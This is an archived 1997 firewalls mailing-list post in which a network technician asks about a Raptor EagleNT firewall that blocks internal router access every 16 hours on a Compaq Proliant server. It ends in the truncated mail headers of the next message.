Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Howdy - I've got a question / comment about Raptor's eagle NT product.

We've set it up on a Compaq Proliant 2500r (single Ppro 200) with 3
Compaq Netflex NICs.  Actually we had a Raptor trained person come out
to our site to help with the EagleNT setup, since we're so swamped.
The problem we're having is that after about 16 hours of uptime, the fw
suddenly cuts off internal access to the router.  This happens every 16
hours without fail.  The only way we've been able to restore it is by
rebooting the server.  NT doesn't lock up, and there are no new events in
the event log.

We've spent a lot of time with Raptor support, and the best advice we
got was "This may be related to PCI bus mastering so disable it on your
computer."  Well you can't do that on a 2500r, so we went to EISA and
ISA NIC's and got the same lockup after 16 hours.  Raptor's other solution
was to use a desktop type computer instead of the Proliant, which
seems pretty hokey.

Has anyone else had a similar experience?

Steve Holden
Network Technician
sholden@digitalglobe.com

From owner-firewalls-outgoing  Tue Jun 10 13:11:18 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA00919 for firewalls-outgoing; Mon, 9 Jun 1997 12:52:42 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA00849 for ; Mon, 9 Jun 1997 12:52:15 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id MAA22981 for ; Mon, 9 Jun 1997 12:56:28 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA06083; Mon, 9 Jun 97 12:54:17 PDT
Received: (fro